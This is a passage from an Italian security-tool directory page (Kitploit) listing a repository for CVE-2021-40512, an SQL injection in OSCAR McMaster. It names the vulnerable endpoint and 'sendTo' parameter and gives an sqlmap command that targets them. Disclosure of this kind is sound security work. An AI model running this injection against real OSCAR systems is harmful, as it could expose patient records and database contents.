Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-40512 — CVE-2021-40512 Vulnerabilità di SQL Injection in OSCAR McMaster 19.40~1235. | Kitploit
Strumenti/GitHubGitHub/war4uthor/cve-2021-40512
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubwar4uthor/cve-2021-40512

CVE-2021-40512

CVE-2021-40512 Vulnerabilità di SQL Injection in OSCAR McMaster 19.40~1235.

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-40512 OSCAR McMaster 19.40~1235 Vulnerabilità di SQL Injection

Una vulnerabilità di SQL injection esiste nella versione 19.40~1235 di OSCAR McMaster. Un attaccante malintenzionato può inviare comandi SQL al database MySQL/MariaDB tramite il parametro vulnerabile sendTo situato sull'endpoint /oscar/oscarEncounter/ViewConsultation.do.

[Segnaposto per cve.mitre]

[Segnaposto per nist]

Pagina JSP vulnerabile:

ViewConsultation.do - parametro sendTo

Payload vulnerabile:

sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0&currentTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner

Scoperta da Jack McBride, agosto 2021

Scarica lo strumento